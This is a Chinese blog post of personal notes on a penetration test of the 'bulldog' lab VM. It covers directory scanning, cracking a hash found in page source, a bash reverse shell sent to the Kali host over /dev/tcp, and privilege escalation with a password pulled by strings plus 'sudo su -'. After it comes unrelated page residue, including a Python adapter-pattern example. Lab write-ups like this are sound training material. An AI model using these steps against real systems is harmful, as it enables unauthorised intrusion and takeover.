渗透测试 bulldog 学习过程笔记

kali ip:192.168.23.131(xshell 7连接)

改为桥接模式

 

(图下是一个开启sshd的过程)

bulldog ip:192.168.23.88 (这里借用了老师搭建的靶机)

网站页面如下,空空如也,没有登录入口,没有能提交表单的入口,无法定位数据库的位置(?)

步骤如下:

kali使用dirb命令扫描靶机网址下的子域名:

得到目录:

访问admin登录,此时查看/dev/可以访问,但/dev/shell、需要登录后访问

f12查看源代码,发现如下信息

估计就是登录需要的用户名和密码了,解密nick后的哈希

网址:MD5免费在线解密破解_MD5在线加密-SOMD5

登录,虽无root权限,但此时可以查看/dev/shell/了 

回到kali开一个监听

 

(附上shell反弹命令)

[~]#棱角 ::Edge.Forum* (ywhack.com)

echo 是可以使用的,这里利用 echo 构建一个反弹shell的命令,然后用管道符交给 bash 执行

(其实这里如果用联合查询注入的话,其实&&是被过滤掉了的)

echo 'bash -i >& /dev/tcp/192.168.23.131/4444 0>&1' | bash

(中间是kali的ip)

run,kali接收到反弹shell

提权,倒数第四行发现bulldogadmin用户

cd ..                                 切换到home下

ls                                     显示目录下的内容

cd bulldogadmin             切换到子目录  

ls -al                                显示隐藏目录

cd .hiddenadmindirectory       转到此目录下

ls -al                                        查看隐藏目录

strings customPermissionApp         提取和显示非文本文件中的文本字符串

得到密码串SUPERultimatePASSWORDyouCANTget

 

(最后的part没搞出来,借用了(2条消息) 靶机渗透【bulldog】_bulldog靶场_‍‍‪‍pinkward的博客-CSDN博客

的几张图片

错误:

 Python 调用本地的 shell 实现,输入 python -c ‘import pty; pty.spawn("/bin/bash")’

sudo su - 进入登录模式,然后输入之前获得的密码串

提权成功 

 

 

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值